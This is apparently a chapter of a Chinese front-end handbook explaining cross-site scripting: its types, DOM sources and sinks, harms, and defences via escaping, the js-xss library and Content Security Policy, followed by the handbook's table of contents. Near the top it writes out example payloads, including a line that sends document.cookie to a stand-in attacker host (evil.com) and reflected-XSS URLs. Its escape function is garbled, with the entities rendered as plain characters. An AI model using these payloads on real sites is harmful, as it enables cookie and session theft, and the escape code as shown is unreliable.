[TOC]
# 概述
XSS全稱是Cross Site Scripting,即跨站腳本,腳本主要有兩種類型:JavaScript和ActionScript。XSS發生在目標網頁的目標用戶的瀏覽器層面,當用戶瀏覽器渲染HTML文檔出現了不被預期的腳步并執行時,XSS就會發生。
將XSS代碼放在awww.evil.com的alert.js上,將鏈接發給目標用戶:
```
http://www.foo.com/xss.html#document.write("<script/src=//www.evil.com/alert.js></script>")
```
比如,盜取用戶Cookie的腳本:
```
new Image().src="http://www.evil.com/steal.php?steal.php?data="+escape(document.cookie)
```
# 類型
XSS有三類:反射類XSS(非持久型XSS)、存儲類XSS(持久型XSS)和DOM XSS。
## 反射類XSS
發出請求時,XSS代碼出現在URL中,作為輸入提交到服務端,服務端解析后響應,在響應內容出現這段XSS代碼,最后瀏覽器解析執行。
**例子一:**
http://www.foo.com/xss/reflect1.php的代碼
```
<?php
echo $_GET['x'];
?>
```
輸入x的值未經過任何過濾就直接輸出,可以提交:
```
http://www.foo.com/xss/flect1php?x=<script>alert(1)</script>
```
服務端解析時,echo完整輸出script>alert\(1\)</script>到響應體,然后瀏覽器解析執行。
**例子二:**
http://www.foo.com/xss/reflect2.php的代碼
```
<?php
header('Location: '.$_GET['x']);
?>
```
輸入x的值作為響應頭部的Location字段值輸出,發生跳轉時,觸發XSS的其中一種方式如下:
```
http://www.foo.com/book/reflect2.php?x=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2b
```
跳轉到data:協議,text/html是MIME靈活Content-Type,表明文檔類型,base64指后面字符串的編碼方式,這段base64解碼后為
```
<script>alert(document.domain)</script>
```
## 存儲型XSS
存儲型XSS提交的XSS代碼會存儲在服務端(不管是數據庫、內存還是文件系統等),下次請求目標頁面時不用再提交XSS代碼。
最典型的例子是留言板XSS,用戶提交一條包含XSS代碼的留言存儲到數據庫,目標用戶查看留言板,就觸發了XSS攻擊。
## DOM XSS
DOM XSS的XSS代碼不需要服務器解析響應的直接參與,觸發XSS靠的是瀏覽器端的DOM解析。
### 常見的輸入點
* ducoment.URL
* document.URLUnencoded
* document.location\(以及location的多個屬性\)
* document.referrer
* window.location\(以及location的多個屬性\)
* window.name
* xhr請求返回的數據
* document.cookie
* 表單項的值
### 常見的輸出點有
* 直接輸出HTML內容、如
* document.write\(...\)
* document.writeln\(...\)
* document.body.innerHtml=...
* 直接修改DOM樹(包括DHTML事件),如:
* document.forms\[0\].action=...(以及其他集合,如:一些對象的src/href屬性等)
* document.attachEvent\(...\)
* document.create\(...\)
* document.execCommand\(...\)
* document.body. ... \(直接通過body對象訪問DOM\)
* window.attachEvent\(...\)
* 替換document URL,如:
* document.location=...(以及直接賦值給location的href、host、hostname屬性)
* document.location.hostname=...
* document.location.replace\(...\)
* document.location.assign\(...\)
* document.URL=...
* window.navigator\(...\)
* 打開或修改新窗口,如:
* document.open\(...\)
* window.open\(...\)
* window.location.href=...(以及直接賦值給location的href、host、hostname屬性)
* 直接執行腳本,如:
* eval\(...\)
* window.execScripteval\(...\)
* window.setIntervaleval\(...\)
* window.setTimeouteval\(...\)
# 哪里可以出現
越來越多的客戶端軟件支持HTML解析和JavaScript解析,如HTML文檔、XML文檔、Flash、PDF、QQ、一些音樂播放器、一些瀏覽器的功能界面等。在不同域范圍內執行的XSS權限也不一樣。
# 危害
* 掛馬
* 盜取用戶Cookie
* Dos(拒絕服務)客戶端瀏覽器
* 釣魚攻擊、高級釣魚技巧
* 編寫針對性的XSS病毒,刪除目標文章、惡意篡改數據、嫁禍
* 挾持用戶Web行為,甚至進一步滲透內網
* 爆發Web 2.0蠕蟲
* 蠕蟲式的DDoS攻擊
* 蠕蟲式掛馬攻擊、刷廣告、刷流量、破壞網上數據
# 防御
## 轉義字符
首先,對于用戶的輸入應該是永遠不信任的。最普遍的做法就是轉義輸入輸出的內容,對于引號、尖括號、斜杠進行轉義
~~~
function escape(str) {
str = str.replace(/&/g, '&')
str = str.replace(/</g, '<')
str = str.replace(/>/g, '>')
str = str.replace(/"/g, '&quto;')
str = str.replace(/'/g, ''')
str = str.replace(/`/g, '`')
str = str.replace(/\//g, '/')
return str
}
~~~
通過轉義可以將攻擊代碼`<script>alert(1)</script>`變成
~~~
// -> <script>alert(1)</script>
escape('<script>alert(1)</script>')
~~~
但是對于顯示富文本來說,顯然不能通過上面的辦法來轉義所有字符,因為這樣會把需要的格式也過濾掉。對于這種情況,通常采用白名單過濾的辦法,當然也可以通過黑名單過濾,但是考慮到需要過濾的標簽和標簽屬性實在太多,更加推薦使用白名單的方式。
~~~
const xss = require('xss')
let html = xss('<h1 id="title">XSS Demo</h1><script>alert("xss");</script>')
// -> <h1>XSS Demo</h1><script>alert("xss");</script>
console.log(html)
~~~
以上示例使用了`js-xss`來實現,可以看到在輸出中保留了`h1`標簽且過濾了`script`標簽。
## 內容安全策略(CSP)
內容安全策略? ?([CSP](https://developer.mozilla.org/en-US/docs/Glossary/CSP "CSP: A CSP (Content Security Policy) is used to detect and mitigate certain types of website related attacks like XSS and data injections.")) 是一個額外的安全層,用于檢測并削弱某些特定類型的攻擊,包括跨站腳本 ([XSS](https://developer.mozilla.org/en-US/docs/Glossary/XSS "XSS: REDIRECT Cross-site scripting [en-US]"))?和數據注入攻擊等。無論是數據盜取、網站內容污染還是散發惡意軟件,這些攻擊都是主要的手段。
CSP 被設計成完全向后兼容(除CSP2 在向后兼容有明確提及的不一致;? 更多細節查看[這里](https://www.w3.org/TR/CSP2)?章節1.1)。不支持CSP的瀏覽器也能與實現了CSP的服務器正常合作,反之亦然:不支持 CSP 的瀏覽器只會忽略它,如常運行,默認為網頁內容使用標準的同源策略。如果網站不提供 CSP 頭部,瀏覽器也使用標準的[同源策略](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy "En/Same origin policy for JavaScript")。
為使CSP可用, 你需要配置你的網絡服務器返回 ?[`Content-Security-Policy`](https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Content-Security-Policy "此頁面仍未被本地化, 期待您的翻譯!")??HTTP頭部 ( 有時你會看到一些關于`X-Content-Security-Policy`頭部的提法, 那是舊版本,你無須再如此指定它)。
除此之外,?[`<meta>`](https://developer.mozilla.org/zh-CN/docs/Web/HTML/Element/meta "HTML ?元素表示那些不能由其它HTML元相關元素?(, , , 或 ) 之一表示的任何元數據信息.")? 元素也可以被用來配置該策略
### 使用CSP
常可以通過兩種方式來開啟 CSP:
1. 設置 HTTP Header 中的`Content-Security-Policy`
2. 設置`meta`標簽的方式`<meta http-equiv="Content-Security-Policy">`
這里以設置 HTTP Header 來舉例
* 只允許加載本站資源
~~~
Content-Security-Policy: default-src ‘self’
~~~
* 只允許加載 HTTPS 協議圖片
~~~
Content-Security-Policy: img-src https://*
~~~
* 允許加載任何來源框架
~~~
Content-Security-Policy: child-src 'none'
~~~
# 參考資料
[內容安全策略( CSP ) - HTTP | MDN](https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSP)
[前端面試之道 - 掘進小冊](https://juejin.im/book/5bdc715fe51d454e755f75ef/section/5bdc721851882516c33430a2)
- 第一部分 HTML
- meta
- meta標簽
- HTML5
- 2.1 語義
- 2.2 通信
- 2.3 離線&存儲
- 2.4 多媒體
- 2.5 3D,圖像&效果
- 2.6 性能&集成
- 2.7 設備訪問
- SEO
- Canvas
- 壓縮圖片
- 制作圓角矩形
- 全局屬性
- 第二部分 CSS
- CSS原理
- 層疊上下文(stacking context)
- 外邊距合并
- 塊狀格式化上下文(BFC)
- 盒模型
- important
- 樣式繼承
- 層疊
- 屬性值處理流程
- 分辨率
- 視口
- CSS API
- grid(未完成)
- flex
- 選擇器
- 3D
- Matrix
- AT規則
- line-height 和 vertical-align
- CSS技術
- 居中
- 響應式布局
- 兼容性
- 移動端適配方案
- CSS應用
- CSS Modules(未完成)
- 分層
- 面向對象CSS(未完成)
- 布局
- 三列布局
- 單列等寬,其他多列自適應均勻
- 多列等高
- 圣杯布局
- 雙飛翼布局
- 瀑布流
- 1px問題
- 適配iPhoneX
- 橫屏適配
- 圖片模糊問題
- stylelint
- 第三部分 JavaScript
- JavaScript原理
- 內存空間
- 作用域
- 執行上下文棧
- 變量對象
- 作用域鏈
- this
- 類型轉換
- 閉包(未完成)
- 原型、面向對象
- class和extend
- 繼承
- new
- DOM
- Event Loop
- 垃圾回收機制
- 內存泄漏
- 數值存儲
- 連等賦值
- 基本類型
- 堆棧溢出
- JavaScriptAPI
- document.referrer
- Promise(未完成)
- Object.create
- 遍歷對象屬性
- 寬度、高度
- performance
- 位運算
- tostring( ) 與 valueOf( )方法
- JavaScript技術
- 錯誤
- 異常處理
- 存儲
- Cookie與Session
- ES6(未完成)
- Babel轉碼
- let和const命令
- 變量的解構賦值
- 字符串的擴展
- 正則的擴展
- 數值的擴展
- 數組的擴展
- 函數的擴展
- 對象的擴展
- Symbol
- Set 和 Map 數據結構
- proxy
- Reflect
- module
- AJAX
- ES5
- 嚴格模式
- JSON
- 數組方法
- 對象方法
- 函數方法
- 服務端推送(未完成)
- JavaScript應用
- 復雜判斷
- 3D 全景圖
- 重載
- 上傳(未完成)
- 上傳方式
- 文件格式
- 渲染大量數據
- 圖片裁剪
- 斐波那契數列
- 編碼
- 數組去重
- 淺拷貝、深拷貝
- instanceof
- 模擬 new
- 防抖
- 節流
- 數組扁平化
- sleep函數
- 模擬bind
- 柯里化
- 零碎知識點
- 第四部分 進階
- 計算機原理
- 數據結構(未完成)
- 算法(未完成)
- 排序算法
- 冒泡排序
- 選擇排序
- 插入排序
- 快速排序
- 搜索算法
- 動態規劃
- 二叉樹
- 瀏覽器
- 瀏覽器結構
- 瀏覽器工作原理
- HTML解析
- CSS解析
- 渲染樹構建
- 布局(Layout)
- 渲染
- 瀏覽器輸入 URL 后發生了什么
- 跨域
- 緩存機制
- reflow(回流)和repaint(重繪)
- 渲染層合并
- 編譯(未完成)
- Babel
- 設計模式(未完成)
- 函數式編程(未完成)
- 正則表達式(未完成)
- 性能
- 性能分析
- 性能指標
- 首屏加載
- 優化
- 瀏覽器層面
- HTTP層面
- 代碼層面
- 構建層面
- 移動端首屏優化
- 服務器層面
- bigpipe
- 構建工具
- Gulp
- webpack
- Webpack概念
- Webpack工具
- Webpack優化
- Webpack原理
- 實現loader
- 實現plugin
- tapable
- Webpack打包后代碼
- rollup.js
- parcel
- 模塊化
- ESM
- 安全
- XSS
- CSRF
- 點擊劫持
- 中間人攻擊
- 密碼存儲
- 測試(未完成)
- 單元測試
- E2E測試
- 框架測試
- 樣式回歸測試
- 異步測試
- 自動化測試
- PWA
- PWA官網
- web app manifest
- service worker
- app install banners
- 調試PWA
- PWA教程
- 框架
- MVVM原理
- Vue
- Vue 餓了么整理
- 樣式
- 技巧
- Vue音樂播放器
- Vue源碼
- Virtual Dom
- computed原理
- 數組綁定原理
- 雙向綁定
- nextTick
- keep-alive
- 導航守衛
- 組件通信
- React
- Diff 算法
- Fiber 原理
- batchUpdate
- React 生命周期
- Redux
- 動畫(未完成)
- 異常監控、收集(未完成)
- 數據采集
- Sentry
- 貝塞爾曲線
- 視頻
- 服務端渲染
- 服務端渲染的利與弊
- Vue SSR
- React SSR
- 客戶端
- 離線包
- 第五部分 網絡
- 五層協議
- TCP
- UDP
- HTTP
- 方法
- 首部
- 狀態碼
- 持久連接
- TLS
- content-type
- Redirect
- CSP
- 請求流程
- HTTP/2 及 HTTP/3
- CDN
- DNS
- HTTPDNS
- 第六部分 服務端
- Linux
- Linux命令
- 權限
- XAMPP
- Node.js
- 安裝
- Node模塊化
- 設置環境變量
- Node的event loop
- 進程
- 全局對象
- 異步IO與事件驅動
- 文件系統
- Node錯誤處理
- koa
- koa-compose
- koa-router
- Nginx
- Nginx配置文件
- 代理服務
- 負載均衡
- 獲取用戶IP
- 解決跨域
- 適配PC與移動環境
- 簡單的訪問限制
- 頁面內容修改
- 圖片處理
- 合并請求
- PM2
- MongoDB
- MySQL
- 常用MySql命令
- 自動化(未完成)
- docker
- 創建CLI
- 持續集成
- 持續交付
- 持續部署
- Jenkins
- 部署與發布
- 遠程登錄服務器
- 增強服務器安全等級
- 搭建 Nodejs 生產環境
- 配置 Nginx 實現反向代理
- 管理域名解析
- 配置 PM2 一鍵部署
- 發布上線
- 部署HTTPS
- Node 應用
- 爬蟲(未完成)
- 例子
- 反爬蟲
- 中間件
- body-parser
- connect-redis
- cookie-parser
- cors
- csurf
- express-session
- helmet
- ioredis
- log4js(未完成)
- uuid
- errorhandler
- nodeclub源碼
- app.js
- config.js
- 消息隊列
- RPC
- 性能優化
- 第七部分 總結
- Web服務器
- 目錄結構
- 依賴
- 功能
- 代碼片段
- 整理
- 知識清單、博客
- 項目、組件、庫
- Node代碼
- 面試必考
- 91算法
- 第八部分 工作代碼總結
- 樣式代碼
- 框架代碼
- 組件代碼
- 功能代碼
- 通用代碼